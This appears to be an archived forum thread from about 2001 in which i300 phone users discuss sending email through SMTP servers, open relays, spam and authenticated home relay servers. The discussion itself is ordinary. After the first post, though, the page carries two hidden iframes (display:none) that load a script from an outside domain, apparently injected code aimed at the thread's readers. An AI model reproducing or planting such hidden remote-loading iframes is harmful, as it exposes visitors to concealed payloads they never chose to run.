+ Reply to Thread

Thread: sending email

sending email

How are many of you sending email from your I300s.

I am using MultiMail Pro and have Earthink as my ISP. More specifically I need to know what server I can use for my SMTP.

The reason I am having trouble is Earthlink will not allow me to send emails if I use the Sprnt PCS dial up for my connection. Eartlink considers my message to be spam since it did not originate on an Earthlink server. So what server can i use to send emails?

Thanks for all your help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

There are several threads covering this topic. Do a search on this forum. You might try using keywordsl ike SMTP.

Good Luck!

yes there is some very useful information in the other postings, but i am specifically looking for a SMTP address that I can use to send email without having to pay a fee.

can anyone help?

yes there is some very useful information in the other postings, but i am specifically looking for a SMTP address that I can use to send email without having to pay a fee.

can anyone help?

Originally posted by nick

can anyone help?

Erm... no. That's known as an open-relay mail server, and if ANYONE out there is stupid enough to run one of these, they'd get blacklisted and their mail would be bouncing throughout the world.

Besides, using someone else's SMTP server without being a member is a common technique used by spammers. Haven't you got enough spam email lately?

Dan
    There is a workaround you could use, however:

If you have always-on internet access via DSL or Cable you could set up a little SMTP relay server on your home PC and use it when sending messages. Just tell your i300 to use your home server to send the message and then tell the relay server to relay it to your ISP's mail server. Since most ISP's use the range of IP addresses they lease to determine who is a valid email user, your home PC will be on this segment and allowed to send mail.

Sure, this is a little more work, but it's pretty much going to be the only way to do what you're asking, because as MooRogue stated, no one wants to run an open-relay server because of valid security concerns.

Do you know of a site that would give instructions on how to set up such a server?

Originally posted by Dan
    no one wants to run an open-relay server because of valid security concerns.
    Emm... the valid security concerns also do apply to your home systems. If anyone ends up doing this, please post it to the board so I can block all email traffic coming from those servers & ISPs

Last thing you want is for a spammer to be using your home computer to send messages like "HOT XXX BLONDS HERE!"

The *right* way to send SMTP messages is to use a service that you have legitimately signed on for, such as the @sprintpcs email address

what is the SMTP for my sprintpcs email address?

Dan
    Originally posted by MooRogue

Emm... the valid security concerns also do apply to your home systems. If anyone ends up doing this, please post it to the board so I can block all email traffic coming from those servers & ISPs

Last thing you want is for a spammer to be using your home computer to send messages like "HOT XXX BLONDS HERE!"

The *right* way to send SMTP messages is to use a service that you have legitimately signed on for, such as the @sprintpcs email address
    I personally do this. The advantage is that I can configure my SMTP service differently than most ISPs do, that is to say, rather than grant/deny based on IP addresses I can require authentication to send mail. Eudora handles this nicely and I have no security concerns as third parties cannot relay mail through my server.

As long as you keep security in mind, make good decisions based on good information and keep your system software updated, this kind of thing is nothing to become grossly overparanoid about.

Also, as I suggested, they should relay the mail to the SMTP server of the ISP that their connection is with, which to me would indicate that it is a service that they have "legitimately signed on for". The "right" way to send SMTP messages is any way which works and is secure.
    Last edited by Dan; 12-17-2001 at 02:23 PM.

I have a linux box setup at my house that I use for SMTP.... after I check my mail on the linux box, it records my IP address and will allow relaying for a given period of time....

the easiest way to solve the SMTP problem is to change the network dialup settings on the I300 to dial into your own ISP...... you can change the settings so that it will dial into your earthlink account, thereby allowing you to use their SMTP services....

I think sprint REALLY needs to allow its wireless users to access their SMTP services.....

hmmm... maybe I should start setting up accounts on my server for SMTP services for I300 users.... what's it worth?

Brooks

Dan
    Originally posted by fikse

I have a linux box setup at my house that I use for SMTP.... after I check my mail on the linux box, it records my IP address and will allow relaying for a given period of time....
    That's an excellent idea as well. You could even set the relay time to something like thirty seconds, as long as you do send and receive at the same time. It's basically the same idea, where if you can authenticate to receive mail, you can authenticate to send it.

Administrator

Arrow

20 bucks/year is nothing to be able to do all of this stuff you guys want to do...

gopherking has tons of more things it can do...

naw, im not a mouthpiece for them, im just trying to take care of my techno-philes here...

go buy and take a look...